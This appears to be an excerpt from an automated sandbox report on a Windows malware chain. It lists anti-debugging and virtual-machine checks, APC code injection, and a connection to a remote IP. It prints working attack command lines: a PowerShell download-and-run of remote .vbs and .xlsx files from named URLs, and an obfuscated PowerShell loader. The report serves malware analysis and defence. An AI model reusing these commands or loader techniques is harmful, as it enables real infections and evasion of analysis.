                        Source: svchost.exe, 00000011.00000002.2356575776.0000000003700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TORUNS.EXEDUMPCAP.EXEDE43
                        Source: svchost.exe, 00000011.00000002.2356575776.0000000003700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHA
                        Source: svchost.exe, 00000011.00000002.2356575776.0000000003700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B7C3AF3 str ax6_2_00007FFD9B7C3AF3
                        Source: C:\Windows\System32\dllhost.exeCode function: GetAdaptersInfo,25_2_000001FC54082B70
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3655Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6189Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6476Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3237Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7739Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1612Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\wscript.exe TID: 7788Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep count: 6476 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep count: 3237 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5816Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 7796Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\splwow64.exeLast function: Thread delayed
                        Source: C:\Windows\splwow64.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF441580B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,18_3_00007DF441580B80
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF441562514 GetSystemInfo,18_3_00007DF441562514
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                        Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local
                        Source: wscript.exe, 00000003.00000003.1726724047.00000207BBED6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1741119452.00000207BBED6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1728659545.00000207BBED6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739502712.00000207BBED6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1730282026.00000207BBED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[
                        Source: wscript.exe, 00000003.00000003.1739484677.00000207BBF2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\vrkers
                        Source: wscript.exe, 00000003.00000003.1730463133.00000207BBE6C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1728507013.00000207BBE51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1741094498.00000207BBE71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1728659545.00000207BBE78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1728932651.00000207BBE78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739502712.00000207BBE70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                        Source: svchost.exe, 00000011.00000003.2268437168.0000000005860000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                        Source: wscript.exe, 00000003.00000003.1726724047.00000207BBED6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1741119452.00000207BBED6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1728659545.00000207BBED6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739502712.00000207BBED6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1730282026.00000207BBED6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2959122078.0000027BC5858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2953294546.0000027BC022B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2263109604.00000000050C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2266667063.00000000050C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.2268662675.00000000050C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.2268662675.000000000506A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: svchost.exe, 00000011.00000002.2356552126.000000000365C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMSAFD RfComm [Bluetooth]RSVP TCP Service Provider
                        Source: svchost.exe, 00000011.00000002.2356501915.0000000003612000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                        Source: svchost.exe, 00000011.00000003.2268437168.0000000005860000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                        Source: powershell.exe, 00000006.00000002.1895709724.000001E370D77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: wscript.exe, 00000000.00000003.1649031207.000002186781C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: powershell.exe, 00000001.00000002.3037983335.000001CC4BABD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F0283 mov eax, dword ptr fs:[00000030h]17_3_032F0283

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Early bird code injection technique detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.149.241.141 2023
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_7924.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7260, type: MEMORYSTR
                        Allocates memory in foreign processes
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1FC54080000 protect: page read and write
                        Queues an APC in another process (thread injection)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000Jump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeMemory written: C:\Windows\System32\dllhost.exe base: 1FC54080000
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF70F3314E0
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx'Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\lsm5k8gou5bjv.xlsx"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelBJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmpshare.exe "C:\Program Files\Windows Media Player\wmpshare.exe"
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command function downloadandrun([string]$url, [string]$destination) { invoke-webrequest -uri $url -outfile $destination ; start-process -filepath $destination -wait };downloadandrun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'c:\users\public\udkz59n9.vbs';downloadandrun -url 'https://www.fornid.com/ab/list%20of%20required%20items.xlsx' -destination 'c:\users\public\lsm5k8gou5bjv.xlsx'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$banky='myohemoglobin';;$tadpolelikemmute='cineangiocardiography';;$hovedkatalogernes='tilbagekobling';;$festsalenes='gryde';;$tadpolelikendustri=$host.name;function ectethmoid($reskompagnierne){if ($tadpolelikendustri) {$endogamic=2} for ($tadpolelike=$endogamic;;$tadpolelike+=3){if(!$reskompagnierne[$tadpolelike]){$forthcoming++;break }$trillers+=$reskompagnierne[$tadpolelike];$disrobes='kogeplader'}$trillers}function allestedsnrvrende($gentlemanise7){ .($iserine) ($gentlemanise7)}$hyetometric=ectethmoid 'srn peoft h.trw';$hyetometric+=ectethmoid 'a.e bsnc plnei je .nbut';$slavepen=ectethmoid 'enm pocuz,fi pl .linafo/';$germanizer162=ectethmoid 'juttrlyas.e1i 2';$kreditstramningen='s [stn re tso.coso.e.er.ovstiadc tebeppao ki ncatb mteastnovaa.greekrr ] ,:ne:s,sboesucnouhyr,oi ttbuyelp aranosetdooc.c osplsu=an$f.gcae bre.mboaadnbri azf e nrje1 k6 s2';$slavepen+=ectethmoid ' c5 ,. m0 i tr( jw ifrnsydfao uwbrser unnvitsa r 1ka0b,.li0ph; o .dws i in b6 v4o ;e, hextr6fl4ca;ri rrr v n:v,1re3b.1 x.af0 .)sp grrel cjeksto r/ra2s 0ap1p 0.a0sk1po0ji1 a fafsui orfuer,flro.axmu/az1 m3in1ci. o0';$campi=ectethmoid 'cuudus ke brop- adegaser n t';$agreed=ectethmoid 's.hdit ht ,ples :d./ l/ ,wunwh w a.arf otfosceeumn ngo i cnbre aes rhusas.uncydo em e/ icotp /roe smsonfaedyrflnadespspr1me2pa3gr..amprdunp >syhsats tnopsls,u:tr/ma/ uwmiwb wra. rpteustn belue .tfa. uafueaa/poifotme/ eotmclnbeearrtintiekls 1p.2 3dr.b.m d p';$untemporally=ectethmoid 'un>';$iserine=ectethmoid ' i,te x';$wordpro='ankomststationens';$husven='\exultet.bid';allestedsnrvrende (ectethmoid 'ud$ igkrlanounbbianelbo:omg cnpea.mv in fi nn.ngky=hj$.eevan pvlo:pharupafpuddfoaalt,aav + $guh su msunvloe.un');allestedsnrvrende (ectethmoid 'in$cogpalb ovabguafolun:basmev niv.nkae s i=km$kaaregm,r pe be .d v.k sapp slsuidetme(to$ gurennettoe vmshpfoo.rrbaavala lbayw,)');allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$svines[0];$montmartre=(ectethmoid 'u $p gs ltao tb pa il,o: og bo lnpidsuoanl tilne srva=r,nbueb w.n-saoh b njxee.ec tbu tusunyflsn td,e ,min.de$buhm y ,esit osym ,ecat r,dicoc');allestedsnrvrende ($montmartre);allestedsnrvrende (ectethmoid 'ka$i gy obenped.ao jlcai,teh.rs . ohs eh ahad aeh r sov[ n$a cr a imr p tile]k =ba$d,smilgla gv ae paferen');$linievogternes=ectethmoid 'po$chgs oclnpjds.omollaiviedar ..,qdsyovew nmol ,oo,a kdflfekipelp.ebe( $ pasng.erpoegre .dk ,tr$qubprek gk,yran.ad efalsmstoe.esbeltei fn njafelerstn elu1 r0tu9aa)';$begyndelseslinjerne109=$gnavning;allestedsnrvrende (ectethmoid ' f$g gb l .oyab.iahela :vuc di,ov oi ulovbapehes okm yfot tsye sl osfneins p= h( pt be.es dteu-scpd,ajutprh.i yi$idb pesogopy n edmeebelk smuew,s ylhvihenbojbae rudnsne a1,u0sk9u.)');while (!$civilbeskyttelses) {allestedsnrvrende (ectethmoid 'in$diglyls o ab hak,lud: rpinu hr eifrfaci cee dpu= $ ouagnf d eh rskb neiltdrabelb
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$banky='myohemoglobin';;$tadpolelikemmute='cineangiocardiography';;$hovedkatalogernes='tilbagekobling';;$festsalenes='gryde';;$tadpolelikendustri=$host.name;function ectethmoid($reskompagnierne){if ($tadpolelikendustri) {$endogamic=2} for ($tadpolelike=$endogamic;;$tadpolelike+=3){if(!$reskompagnierne[$tadpolelike]){$forthcoming++;break }$trillers+=$reskompagnierne[$tadpolelike];$disrobes='kogeplader'}$trillers}function allestedsnrvrende($gentlemanise7){ .($iserine) ($gentlemanise7)}$hyetometric=ectethmoid 'srn peoft h.trw';$hyetometric+=ectethmoid 'a.e bsnc plnei je .nbut';$slavepen=ectethmoid 'enm pocuz,fi pl .linafo/';$germanizer162=ectethmoid 'juttrlyas.e1i 2';$kreditstramningen='s [stn re tso.coso.e.er.ovstiadc tebeppao ki ncatb mteastnovaa.greekrr ] ,:ne:s,sboesucnouhyr,oi ttbuyelp aranosetdooc.c osplsu=an$f.gcae bre.mboaadnbri azf e nrje1 k6 s2';$slavepen+=ectethmoid ' c5 ,. m0 i tr( jw ifrnsydfao uwbrser unnvitsa r 1ka0b,.li0ph; o .dws i in b6 v4o ;e, hextr6fl4ca;ri rrr v n:v,1re3b.1 x.af0 .)sp grrel cjeksto r/ra2s 0ap1p 0.a0sk1po0ji1 a fafsui orfuer,flro.axmu/az1 m3in1ci. o0';$campi=ectethmoid 'cuudus ke brop- adegaser n t';$agreed=ectethmoid 's.hdit ht ,ples :d./ l/ ,wunwh w a.arf otfosceeumn ngo i cnbre aes rhusas.uncydo em e/ icotp /roe smsonfaedyrflnadespspr1me2pa3gr..amprdunp >syhsats tnopsls,u:tr/ma/ uwmiwb wra. rpteustn belue .tfa. uafueaa/poifotme/ eotmclnbeearrtintiekls 1p.2 3dr.b.m d p';$untemporally=ectethmoid 'un>';$iserine=ectethmoid ' i,te x';$wordpro='ankomststationens';$husven='\exultet.bid';allestedsnrvrende (ectethmoid 'ud$ igkrlanounbbianelbo:omg cnpea.mv in fi nn.ngky=hj$.eevan pvlo:pharupafpuddfoaalt,aav + $guh su msunvloe.un');allestedsnrvrende (ectethmoid 'in$cogpalb ovabguafolun:basmev niv.nkae s i=km$kaaregm,r pe be .d v.k sapp slsuidetme(to$ gurennettoe vmshpfoo.rrbaavala lbayw,)');allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$svines[0];$montmartre=(ectethmoid 'u $p gs ltao tb pa il,o: og bo lnpidsuoanl tilne srva=r,nbueb w.n-saoh b njxee.ec tbu tusunyflsn td,e ,min.de$buhm y ,esit osym ,ecat r,dicoc');allestedsnrvrende ($montmartre);allestedsnrvrende (ectethmoid 'ka$i gy obenped.ao jlcai,teh.rs . ohs eh ahad aeh r sov[ n$a cr a imr p tile]k =ba$d,smilgla gv ae paferen');$linievogternes=ectethmoid 'po$chgs oclnpjds.omollaiviedar ..,qdsyovew nmol ,oo,a kdflfekipelp.ebe( $ pasng.erpoegre .dk ,tr$qubprek gk,yran.ad efalsmstoe.esbeltei fn njafelerstn elu1 r0tu9aa)';$begyndelseslinjerne109=$gnavning;allestedsnrvrende (ectethmoid ' f$g gb l .oyab.iahela :vuc di,ov oi ulovbapehes okm yfot tsye sl osfneins p= h( pt be.es dteu-scpd,ajutprh.i yi$idb pesogopy n edmeebelk smuew,s ylhvihenbojbae rudnsne a1,u0sk9u.)');while (!$civilbeskyttelses) {allestedsnrvrende (ectethmoid 'in$diglyls o ab hak,lud: rpinu hr eifrfaci cee dpu= $ ouagnf d eh rskb neiltdrabelb
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command function downloadandrun([string]$url, [string]$destination) { invoke-webrequest -uri $url -outfile $destination ; start-process -filepath $destination -wait };downloadandrun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'c:\users\public\udkz59n9.vbs';downloadandrun -url 'https://www.fornid.com/ab/list%20of%20required%20items.xlsx' -destination 'c:\users\public\lsm5k8gou5bjv.xlsx'Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$banky='myohemoglobin';;$tadpolelikemmute='cineangiocardiography';;$hovedkatalogernes='tilbagekobling';;$festsalenes='gryde';;$tadpolelikendustri=$host.name;function ectethmoid($reskompagnierne){if ($tadpolelikendustri) {$endogamic=2} for ($tadpolelike=$endogamic;;$tadpolelike+=3){if(!$reskompagnierne[$tadpolelike]){$forthcoming++;break }$trillers+=$reskompagnierne[$tadpolelike];$disrobes='kogeplader'}$trillers}function allestedsnrvrende($gentlemanise7){ .($iserine) ($gentlemanise7)}$hyetometric=ectethmoid 'srn peoft h.trw';$hyetometric+=ectethmoid 'a.e bsnc plnei je .nbut';$slavepen=ectethmoid 'enm pocuz,fi pl .linafo/';$germanizer162=ectethmoid 'juttrlyas.e1i 2';$kreditstramningen='s [stn re tso.coso.e.er.ovstiadc tebeppao ki ncatb mteastnovaa.greekrr ] ,:ne:s,sboesucnouhyr,oi ttbuyelp aranosetdooc.c osplsu=an$f.gcae bre.mboaadnbri azf e nrje1 k6 s2';$slavepen+=ectethmoid ' c5 ,. m0 i tr( jw ifrnsydfao uwbrser unnvitsa r 1ka0b,.li0ph; o .dws i in b6 v4o ;e, hextr6fl4ca;ri rrr v n:v,1re3b.1 x.af0 .)sp grrel cjeksto r/ra2s 0ap1p 0.a0sk1po0ji1 a fafsui orfuer,flro.axmu/az1 m3in1ci. o0';$campi=ectethmoid 'cuudus ke brop- adegaser n t';$agreed=ectethmoid 's.hdit ht ,ples :d./ l/ ,wunwh w a.arf otfosceeumn ngo i cnbre aes rhusas.uncydo em e/ icotp /roe smsonfaedyrflnadespspr1me2pa3gr..amprdunp >syhsats tnopsls,u:tr/ma/ uwmiwb wra. rpteustn belue .tfa. uafueaa/poifotme/ eotmclnbeearrtintiekls 1p.2 3dr.b.m d p';$untemporally=ectethmoid 'un>';$iserine=ectethmoid ' i,te x';$wordpro='ankomststationens';$husven='\exultet.bid';allestedsnrvrende (ectethmoid 'ud$ igkrlanounbbianelbo:omg cnpea.mv in fi nn.ngky=hj$.eevan pvlo:pharupafpuddfoaalt,aav + $guh su msunvloe.un');allestedsnrvrende (ectethmoid 'in$cogpalb ovabguafolun:basmev niv.nkae s i=km$kaaregm,r pe be .d v.k sapp slsuidetme(to$ gurennettoe vmshpfoo.rrbaavala lbayw,)');allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$svines[0];$montmartre=(ectethmoid 'u $p gs ltao tb pa il,o: og bo lnpidsuoanl tilne srva=r,nbueb w.n-saoh b njxee.ec tbu tusunyflsn td,e ,min.de$buhm y ,esit osym ,ecat r,dicoc');allestedsnrvrende ($montmartre);allestedsnrvrende (ectethmoid 'ka$i gy obenped.ao jlcai,teh.rs . ohs eh ahad aeh r sov[ n$a cr a imr p tile]k =ba$d,smilgla gv ae paferen');$linievogternes=ectethmoid 'po$chgs oclnpjds.omollaiviedar ..,qdsyovew nmol ,oo,a kdflfekipelp.ebe( $ pasng.erpoegre .dk ,tr$qubprek gk,yran.ad efalsmstoe.esbeltei fn njafelerstn elu1 r0tu9aa)';$begyndelseslinjerne109=$gnavning;allestedsnrvrende (ectethmoid ' f$g gb l .oyab.iahela :vuc di,ov oi ulovbapehes okm yfot tsye sl osfneins p= h( pt be.es dteu-scpd,ajutprh.i yi$idb pesogopy n edmeebelk smuew,s ylhvihenbojbae rudnsne a1,u0sk9u.)');while (!$civilbeskyttelses) {allestedsnrvrende (ectethmoid 'in$diglyls o ab hak,lud: rpinu hr eifrfaci cee dpu= $ ouagnf d eh rskb neiltdrabelbJump to behavior
